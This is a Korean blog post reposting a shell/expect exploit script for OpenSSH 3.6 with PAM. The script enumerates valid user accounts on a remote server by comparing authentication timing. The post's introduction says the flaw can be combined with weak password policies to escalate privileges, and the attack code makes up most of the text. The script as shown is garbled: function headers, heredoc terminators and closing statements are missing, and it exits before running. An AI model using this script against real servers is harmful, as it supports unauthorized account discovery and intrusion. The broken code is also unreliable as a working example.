2013년 11월 26일 화요일

OpenSSH/PAM 타이밍 공격 소스코드

발표날짜 :

해당 시스템 :
- OpenSSH 3.6

공격 유형 :

위험도 :

문제점 :
PAM 을 지원하는 OpenSSH 에서 발견된 치명적인 버그를 이용하여 공격하면 원격에서 유효한 사용자들을 이용하여 타이밍 공격을 할 수 있게된다.

또한 취약한 비밀번호 정책과 보안 정책과 함께 이용하여 공격하면 쉽게 권한 상승을 얻어낼 수 있다.

공격법 / 공격용 소스코드 :
# OpenSSH <= 3.6.p1 - User Identification.
# Nicolas Couture - nc@stormvault.net
# Description:
# -Tells you wether or not a user exist on
# a distant server running OpenSSH.
# Usage:
# -You NEED to have the host's public key
# before executing this script.

# Fact Sheet: #
# o It is really accurate against #
# redhat boxes. #
# o Linux boxes running grsecurity #
# has 10 seconds delay on both #
# valid AND invalid user login #
# attempts. #
# o *BSD boxes are not vulnerables and #
# always has 10 seconds delay like #
# Linux-Grsec + network protection #
# #

# History: #
# Thu May 1 15:41:18 EDT 2003 #
# ; Script started. #
# Thu May 1 16:42:30 EDT 2003 #
# ; Script is functional. #

# Let the user know how we work.
echo "$0 <user> <host>"
exit 1

# Verify the arguments.
[ $# != 2 ] && usage

# Variables.

# Expect script functions #

# Expect script for password.
expasswd() {
cat << EOF > expasswd
spawn $SSHCMD
expect password:
send '\r'

# Expect script for error.
experror() {
cat << EOF > experror
spawn expect -f expasswd
expect again.
exit 1593

# -Fake user timing #

# OpenSSH client command for inexisting user.
export SSHCMD="ssh nicolas_couture@$HOST"

# Build new expect script.

# Timing.
FDATE0=`date '+%s'`
echo "[-] Calculating fake user timeout..."
expect -f experror 1> /dev/null 2> /dev/null
FDATE1=`date '+%s'`

# Fake user timeout.
FUTO=`echo $FDATE1 - $FDATE0 | bc`
echo "[+] Found $FUTO."

# -$USER timing #

# OpenSSH command.
export SSHCMD="ssh $USER@$HOST"

# Build new expect scripts.

DATE0=`date '+%s'`
echo "[-] Calculating $USER timeout on $SERVER..."
expect -f experror 1> /dev/null 2> /dev/null
DATE1=`date '+%s'`

# $USER timeout.
END=`echo $DATE1 - $DATE0 | bc`
echo "[+] Found $END."

# -Result #

if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then
echo "This box is not vulnerable."
exit 1

# Use of our magic skills.
if [ "$FUTO" -lt "$END" ]; then
echo "$USER exist on $HOST."
elif [ "$FUTO" -ge "$END" ]; then
echo "$USER doesn't exist on $HOST."
echo "Segmentation fault."
exit 13

# Remove tmp files.
rm -rf expasswd experror


출처: http://www.hackersnews.org/

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